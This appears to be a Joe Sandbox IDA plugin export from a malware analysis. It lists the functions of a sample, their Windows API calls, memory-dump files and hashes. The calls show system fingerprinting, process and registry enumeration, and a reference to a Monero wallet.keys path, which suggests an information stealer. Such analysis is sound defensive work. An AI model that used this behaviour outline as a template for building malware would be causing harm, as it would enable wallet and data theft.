Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 46bf7574e66d4c1f81a4a25b4c8adfbd039231e14084afdab6f789724b1c0df0
Instruction ID: 274c36693a4fc0adc6bf90e0e4ba04dd7e63c045c7bf35df1123d075a86ba0c3
Opcode Fuzzy Hash: 46bf7574e66d4c1f81a4a25b4c8adfbd039231e14084afdab6f789724b1c0df0
Instruction Fuzzy Hash: 1E918775A102089FCB29EF64D991FEDB7B5FF94300F408519EC0A9F251DB31AA09DB92

Function 00350765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01368820), ref: 0035079A
StrCmpCA.SHLWAPI(00000000,013688E0), ref: 00350866
StrCmpCA.SHLWAPI(00000000,01368900), ref: 0035099D

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 5c37f6ea5a0f245ad506a86926820f3cd919f2147355a49447dc2e940f3b9135
Instruction ID: 8bcf546a835654eb077368beb7bdd846dc7310e7e292c142845264255bfd6098
Opcode Fuzzy Hash: 5c37f6ea5a0f245ad506a86926820f3cd919f2147355a49447dc2e940f3b9135
Instruction Fuzzy Hash: 61817675B102089FCB19EF64C991EEDB7B5FF94300F508519EC0A9F255DB30AA0ADB92

Function 003578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
RtlAllocateHeap.NTDLL(00000000), ref: 00357917
GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
Instruction ID: 8fe26494bcd6fe7142d658902e07557b935ebeaa651a54b75a60f0d97ba0d8c8
Opcode Fuzzy Hash: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
Instruction Fuzzy Hash: AF016DB1A04208EBD710DF98DD45FAAFBB8FB04B22F10421AEE45A2690C37459088BA1

Function 6C643060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C643095

Part of subcall function 6C6435A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6CF688,00001000), ref: 6C6435D5
Part of subcall function 6C6435A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6435E0
Part of subcall function 6C6435A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6435FD
Part of subcall function 6C6435A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C64363F
Part of subcall function 6C6435A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C64369F
Part of subcall function 6C6435A0: __aulldiv.LIBCMT ref: 6C6436E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C64309F

Part of subcall function 6C665B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6656EE,?,00000001), ref: 6C665B85
Part of subcall function 6C665B50: EnterCriticalSection.KERNEL32(6C6CF688,?,?,?,6C6656EE,?,00000001), ref: 6C665B90
Part of subcall function 6C665B50: LeaveCriticalSection.KERNEL32(6C6CF688,?,?,?,6C6656EE,?,00000001), ref: 6C665BD8
Part of subcall function 6C665B50: GetTickCount64.KERNEL32 ref: 6C665BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6430BE

Part of subcall function 6C6430F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C643127
Part of subcall function 6C6430F0: __aulldiv.LIBCMT ref: 6C643140

Part of subcall function 6C67AB2A: __onexit.LIBCMT ref: 6C67AB30

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 90bb19d596cd19b9e109a1c1e37fe8f3494d5e05090064cf039e43480f1316a7
Instruction ID: 0a3d4c530006326cd036d0f6f8b144b86ba2e6d1524010d78cfd7b0507523151
Opcode Fuzzy Hash: 90bb19d596cd19b9e109a1c1e37fe8f3494d5e05090064cf039e43480f1316a7
Instruction Fuzzy Hash: 07F0F962E2074496CB10DF7788D11E67770AF6B114F105729E88457652FB20A3D883DF

Function 00359470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00359484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003594A5
CloseHandle.KERNEL32(00000000), ref: 003594AF

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: a6d9bd4508ba76ccae4d4f0823a2e8a1dfc1ff36111cf97cdf2b9fe9bf5311b7
Instruction ID: ace4d52ea5c9533e4164ecf45fe928981b1028aadd538c4b9f5d3b651063f593
Opcode Fuzzy Hash: a6d9bd4508ba76ccae4d4f0823a2e8a1dfc1ff36111cf97cdf2b9fe9bf5311b7
Instruction Fuzzy Hash: 7AF05E7490020CFBEB05DFA4DC4AFED7778EB08301F004599BE09AB290D6B06E89DB91

Function 00341110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
ExitProcess.KERNEL32 ref: 00341143

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
Instruction ID: a8f467ad42c93c1126d2746b8ed9821c7bd4229069f2be097e4aaaf657b2c99d
Opcode Fuzzy Hash: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
Instruction Fuzzy Hash: 96E0E670A45348FBF710ABA09C0AB1976B8EB14B41F105055FB09BA1D0D6B53645AB9A

Function 00351A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00357500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00357542
Part of subcall function 00357500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0035757F
Part of subcall function 00357500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357603
Part of subcall function 00357500: RtlAllocateHeap.NTDLL(00000000), ref: 0035760A

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 00357690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003576A4
Part of subcall function 00357690: RtlAllocateHeap.NTDLL(00000000), ref: 003576AB

Part of subcall function 003577C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0035DBC0,000000FF,?,00351C99,00000000,?,0136D4B8,00000000,?), ref: 003577F2
Part of subcall function 003577C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0035DBC0,000000FF,?,00351C99,00000000,?,0136D4B8,00000000,?), ref: 003577F9

Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Part of subcall function 00357980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E00,00000000,?), ref: 003579B0
Part of subcall function 00357980: RtlAllocateHeap.NTDLL(00000000), ref: 003579B7
Part of subcall function 00357980: GetLocalTime.KERNEL32(?,?,?,?,?,00360E00,00000000,?), ref: 003579C4
Part of subcall function 00357980: wsprintfA.USER32 ref: 003579F3

Part of subcall function 00357A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0136DDA8,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357A63
Part of subcall function 00357A30: RtlAllocateHeap.NTDLL(00000000), ref: 00357A6A
Part of subcall function 00357A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0136DDA8,00000000,?,00360E10,00000000,?,00000000,00000000,?), ref: 00357A7D

Part of subcall function 00357B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0136DDA8,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357B35

Part of subcall function 00357B90: GetKeyboardLayoutList.USER32(00000000,00000000,003605AF), ref: 00357BE1
Part of subcall function 00357B90: LocalAlloc.KERNEL32(00000040,?), ref: 00357BF9
Part of subcall function 00357B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00357C0D
Part of subcall function 00357B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00357C62
Part of subcall function 00357B90: LocalFree.KERNEL32(00000000), ref: 00357D22

Part of subcall function 00357D80: GetSystemPowerStatus.KERNEL32(?), ref: 00357DAD

GetCurrentProcessId.KERNEL32(00000000,?,0136D678,00000000,?,00360E24,00000000,?,00000000,00000000,?,0136DC40,00000000,?,00360E20,00000000), ref: 0035207E

Part of subcall function 00359470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00359484
Part of subcall function 00359470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003594A5
Part of subcall function 00359470: CloseHandle.KERNEL32(00000000), ref: 003594AF

Part of subcall function 00357E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357E37
Part of subcall function 00357E00: RtlAllocateHeap.NTDLL(00000000), ref: 00357E3E
Part of subcall function 00357E00: RegOpenKeyExA.KERNEL32(80000002,0135BB98,00000000,00020119,?), ref: 00357E5E
Part of subcall function 00357E00: RegQueryValueExA.KERNEL32(?,0136D438,00000000,00000000,000000FF,000000FF), ref: 00357E7F
Part of subcall function 00357E00: RegCloseKey.ADVAPI32(?), ref: 00357E92

Part of subcall function 00357F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00357FC9
Part of subcall function 00357F60: GetLastError.KERNEL32 ref: 00357FD8

Part of subcall function 00357ED0: GetSystemInfo.KERNEL32(00360E2C), ref: 00357F00
Part of subcall function 00357ED0: wsprintfA.USER32 ref: 00357F16

Part of subcall function 00358100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0136DD78,00000000,?,00360E2C,00000000,?,00000000), ref: 00358130
Part of subcall function 00358100: RtlAllocateHeap.NTDLL(00000000), ref: 00358137
Part of subcall function 00358100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00358158
Part of subcall function 00358100: wsprintfA.USER32 ref: 003581AC

Part of subcall function 003587C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E28,00000000,?), ref: 0035882F
Part of subcall function 003587C0: RtlAllocateHeap.NTDLL(00000000), ref: 00358836
Part of subcall function 003587C0: wsprintfA.USER32 ref: 00358850

Part of subcall function 00358320: RegOpenKeyExA.KERNEL32(00000000,0136AEA0,00000000,00020019,00000000,003605B6), ref: 003583A4

Part of subcall function 00358320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
Part of subcall function 00358320: wsprintfA.USER32 ref: 00358459
Part of subcall function 00358320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0035847B
Part of subcall function 00358320: RegCloseKey.ADVAPI32(00000000), ref: 0035848C
Part of subcall function 00358320: RegCloseKey.ADVAPI32(00000000), ref: 00358499

Part of subcall function 00358680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003605B7), ref: 003586CA
Part of subcall function 00358680: Process32First.KERNEL32(?,00000128), ref: 003586DE
Part of subcall function 00358680: Process32Next.KERNEL32(?,00000128), ref: 003586F3
Part of subcall function 00358680: CloseHandle.KERNEL32(?), ref: 00358761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0035265B

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: 023d7f820eb2b12c13dd62c5c1f9959d0ffcc990979e88494f2834ed26efda06
Instruction ID: 6bdad8c4ad49889265d4405d95590bc673ddc27b84fd3841ead08515c549fb25
Opcode Fuzzy Hash: 023d7f820eb2b12c13dd62c5c1f9959d0ffcc990979e88494f2834ed26efda06
Instruction Fuzzy Hash: 65725D72C10518AADB1BFB90DC92DEE7778AF14301F508399B9166A071EF302B4DEB65

Function 00346D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
